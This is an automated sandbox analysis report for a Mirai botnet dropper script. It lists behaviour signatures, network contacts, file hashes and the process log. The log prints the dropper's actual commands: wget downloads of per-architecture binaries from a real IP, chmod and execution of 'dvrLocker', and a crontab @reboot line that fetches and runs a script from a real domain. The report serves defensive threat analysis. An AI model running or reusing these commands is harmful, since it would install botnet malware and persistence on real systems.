Malware Analysis Report

2024-11-13 18:02

Sample ID 241109-d3k42awkcy
Target becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
SHA256 becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049
Tags
mirai botnet botnet defense_evasion discovery execution persistence privilege_escalation
score
10/10

Analysis Overview

score
10/10

SHA256

becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049

Threat Level: Known bad

The file becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh was found to be: Known bad.

Malicious Activity Summary

mirai botnet botnet defense_evasion discovery execution persistence privilege_escalation

Mirai family

Mirai

Renames itself

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Executes dropped EXE

Creates/modifies Cron job

Changes its process name

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 03:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 03:32

Reported

2024-11-09 03:34

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

131s

Max time network

150s

Command Line

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A
N/A N/A /mnt/dvrLocker N/A
N/A N/A /mnt/dvrLocker N/A

Unexpected DNS network traffic destination

Description     Indicator       Process  Target
Destination IP  185.181.61.24   N/A      N/A
Destination IP  80.152.203.134  N/A      N/A
Destination IP  185.181.61.24   N/A      N/A
Destination IP  5.161.109.23    N/A      N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description                   Indicator                            Process           Target
File opened for modification  /var/spool/cron/crontabs/tmp.YT83ty  /usr/bin/crontab  N/A
File opened for modification  /var/spool/cron/crontabs/tmp.kafmbq  /usr/bin/crontab  N/A
File opened for modification  /var/spool/cron/crontabs/tmp.wKc6UU  /usr/bin/crontab  N/A

Changes its process name

Description                                                      Indicator                Process             Target
Changes the process name, possibly in an attempt to hide itself  /bin/sh /etc/init.d/rcS  /tmp/lib/dvrLocker  N/A
Changes the process name, possibly in an attempt to hide itself  mini_httpd               /mnt/dvrLocker      N/A
Changes the process name, possibly in an attempt to hide itself  /bin/busybox ntpd        /mnt/dvrLocker      N/A

Reads runtime system information

discovery
Description              Indicator          Process     Target
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/mkdir  N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description                   Indicator           Process                                                                   Target
File opened for modification  /tmp/lib/dvrLocker  /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh  N/A

Processes

/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/1024/exe]

/bin/ls

[ls -l /proc/1029/exe]

/bin/ls

[ls -l /proc/1043/exe]

/bin/ls

[ls -l /proc/1049/exe]

/bin/ls

[ls -l /proc/1062/exe]

/bin/ls

[ls -l /proc/1066/exe]

/bin/ls

[ls -l /proc/1068/exe]

/bin/ls

[ls -l /proc/1071/exe]

/bin/ls

[ls -l /proc/1078/exe]

/bin/ls

[ls -l /proc/1086/exe]

/bin/ls

[ls -l /proc/1090/exe]

/bin/ls

[ls -l /proc/1099/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/1109/exe]

/bin/ls

[ls -l /proc/1119/exe]

/bin/ls

[ls -l /proc/1123/exe]

/bin/ls

[ls -l /proc/1127/exe]

/bin/ls

[ls -l /proc/1131/exe]

/bin/ls

[ls -l /proc/1135/exe]

/bin/ls

[ls -l /proc/1139/exe]

/bin/ls

[ls -l /proc/1144/exe]

/bin/ls

[ls -l /proc/1148/exe]

/bin/ls

[ls -l /proc/1149/exe]

/bin/ls

[ls -l /proc/115/exe]

/bin/ls

[ls -l /proc/1152/exe]

/bin/ls

[ls -l /proc/1153/exe]

/bin/ls

[ls -l /proc/1156/exe]

/bin/ls

[ls -l /proc/1163/exe]

/bin/ls

[ls -l /proc/1164/exe]

/bin/ls

[ls -l /proc/1167/exe]

/bin/ls

[ls -l /proc/1170/exe]

/bin/ls

[ls -l /proc/1176/exe]

/bin/ls

[ls -l /proc/1181/exe]

/bin/ls

[ls -l /proc/1184/exe]

/bin/ls

[ls -l /proc/1186/exe]

/bin/ls

[ls -l /proc/1187/exe]

/bin/ls

[ls -l /proc/1190/exe]

/bin/ls

[ls -l /proc/1193/exe]

/bin/ls

[ls -l /proc/1196/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/1236/exe]

/bin/ls

[ls -l /proc/1241/exe]

/bin/ls

[ls -l /proc/1252/exe]

/bin/ls

[ls -l /proc/1253/exe]

/bin/ls

[ls -l /proc/1268/exe]

/bin/ls

[ls -l /proc/1288/exe]

/bin/ls

[ls -l /proc/1289/exe]

/bin/ls

[ls -l /proc/1298/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/130/exe]

/bin/ls

[ls -l /proc/1305/exe]

/bin/ls

[ls -l /proc/1321/exe]

/bin/ls

[ls -l /proc/1329/exe]

/bin/ls

[ls -l /proc/1336/exe]

/bin/ls

[ls -l /proc/1345/exe]

/bin/ls

[ls -l /proc/1357/exe]

/bin/ls

[ls -l /proc/1376/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/1479/exe]

/bin/ls

[ls -l /proc/1480/exe]

/bin/ls

[ls -l /proc/1483/exe]

/bin/ls

[ls -l /proc/1485/exe]

/bin/ls

[ls -l /proc/1486/exe]

/bin/ls

[ls -l /proc/1495/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/163/exe]

/bin/ls

[ls -l /proc/164/exe]

/bin/ls

[ls -l /proc/165/exe]

/bin/ls

[ls -l /proc/166/exe]

/bin/ls

[ls -l /proc/167/exe]

/bin/ls

[ls -l /proc/168/exe]

/bin/ls

[ls -l /proc/169/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/170/exe]

/bin/ls

[ls -l /proc/171/exe]

/bin/ls

[ls -l /proc/172/exe]

/bin/ls

[ls -l /proc/173/exe]

/bin/ls

[ls -l /proc/174/exe]

/bin/ls

[ls -l /proc/175/exe]

/bin/ls

[ls -l /proc/176/exe]

/bin/ls

[ls -l /proc/177/exe]

/bin/ls

[ls -l /proc/178/exe]

/bin/ls

[ls -l /proc/179/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/180/exe]

/bin/ls

[ls -l /proc/182/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/207/exe]

/bin/ls

[ls -l /proc/208/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/242/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/273/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/30/exe]

/bin/ls

[ls -l /proc/31/exe]

/bin/ls

[ls -l /proc/32/exe]

/bin/ls

[ls -l /proc/322/exe]

/bin/ls

[ls -l /proc/325/exe]

/bin/ls

[ls -l /proc/34/exe]

/bin/ls

[ls -l /proc/35/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/417/exe]

/bin/ls

[ls -l /proc/425/exe]

/bin/ls

[ls -l /proc/428/exe]

/bin/ls

[ls -l /proc/444/exe]

/bin/ls

[ls -l /proc/452/exe]

/bin/ls

[ls -l /proc/457/exe]

/bin/ls

[ls -l /proc/464/exe]

/bin/ls

[ls -l /proc/465/exe]

/bin/ls

[ls -l /proc/468/exe]

/bin/ls

[ls -l /proc/469/exe]

/bin/ls

[ls -l /proc/477/exe]

/bin/ls

[ls -l /proc/488/exe]

/bin/ls

[ls -l /proc/490/exe]

/bin/ls

[ls -l /proc/495/exe]

/bin/ls

[ls -l /proc/496/exe]

/bin/ls

[ls -l /proc/499/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/516/exe]

/bin/ls

[ls -l /proc/518/exe]

/bin/ls

[ls -l /proc/545/exe]

/bin/ls

[ls -l /proc/551/exe]

/bin/ls

[ls -l /proc/562/exe]

/bin/ls

[ls -l /proc/586/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/606/exe]

/bin/ls

[ls -l /proc/608/exe]

/bin/ls

[ls -l /proc/633/exe]

/bin/ls

[ls -l /proc/641/exe]

/bin/ls

[ls -l /proc/644/exe]

/bin/ls

[ls -l /proc/673/exe]

/bin/ls

[ls -l /proc/680/exe]

/bin/ls

[ls -l /proc/683/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/710/exe]

/bin/ls

[ls -l /proc/715/exe]

/bin/ls

[ls -l /proc/722/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/83/exe]

/bin/ls

[ls -l /proc/84/exe]

/bin/ls

[ls -l /proc/85/exe]

/bin/ls

[ls -l /proc/89/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/ls

[ls -l /proc/908/exe]

/bin/ls

[ls -l /proc/953/exe]

/bin/ls

[ls -l /proc/957/exe]

/bin/ls

[ls -l /proc/962/exe]

/bin/ls

[ls -l /proc/966/exe]

/bin/ls

[ls -l /proc/969/exe]

/bin/ls

[ls -l /proc/98/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

Network

Country  Destination          Domain                 Proto
N/A      224.0.0.251:5353                            udp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
US       151.101.193.91:443                          tcp
DE       80.152.203.134:53    kingstonwikkerink.dyn  udp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       88.151.195.22:12795  kingstonwikkerink.dyn  tcp
UA       45.202.35.91:80      45.202.35.91           tcp
GB       89.187.167.6:443                            tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
NO       185.181.61.24:53     kingstonwikkerink.dyn  udp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       88.151.195.22:24968  kingstonwikkerink.dyn  tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
UA       45.202.35.91:80      45.202.35.91           tcp
GB       185.125.188.61:443                          tcp
UA       45.202.35.91:80      45.202.35.91           tcp
GB       185.125.188.61:443                          tcp
US       5.161.109.23:53      kingstonwikkerink.dyn  udp
UA       45.202.35.91:80      45.202.35.91           tcp
NO       185.181.61.24:53     kingstonwikkerink.dyn  udp
BG       31.13.248.89:12243   kingstonwikkerink.dyn  tcp

Files

/tmp/lib/dvrLocker

MD5 bb9275394716c60d1941432c7085ca13
SHA1 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d

/var/spool/cron/crontabs/tmp.YT83ty

MD5 aa6236daa7d70f1a76eb197a0c42f2e8
SHA1 86acf7fa9f0bb64920282a89d46dddded4391f31
SHA256 c68bab04e8a86ffc1a19fe66341b7c14212af3df011b57d61eb218a206ca4fab
SHA512 5c6f4a9c4a3cdb12b4370efe26fad53ce3a5b4bd8074a6960c24542eb74dbe870db84a188902dd837df9aaa52317cdb5c5fc0120dd28e25d19a98d0ee9128642

/var/spool/cron/crontabs/tmp.kafmbq

MD5 e58051ca9579fa36df18c83aa8016617
SHA1 901514003c1a32f945c7ebdb132bab290b2e9da3
SHA256 984911f805d18824cb0dbdad9ca9913c124669d9e3eb7102e4e576a48c98b7be
SHA512 735aa551bbe2ae83f338b5c7c4d064b86e989e9e717bfc5d308165a81a9840e0022e3e89dfef40e5817a582928d7c97f7ca3a3eea68d3a4cc9d859562b50e8f6

/var/spool/cron/crontabs/tmp.wKc6UU

MD5 3aa2a28ef3f5f27b7e64c32c9d716874
SHA1 7fa732c1a320d458ad84da4d885edc682c5a0600
SHA256 900a42d0127c2a27d4ce3029b9b0aa61a4a288012426476f9c801f59394b95b0
SHA512 e9e30db5a2a0da8f153399307ab378bb50ba03e87d0f4a9d3d5e4e4a294b51f51397478a163e2738ca0880f092f5922d5ac2d13c3834b1dc399c97bfbc4d2de2

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 03:32

Reported

2024-11-09 03:34

Platform

debian9-armhf-20240729-en

Max time kernel

15s

Max time network

17s

Command Line

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
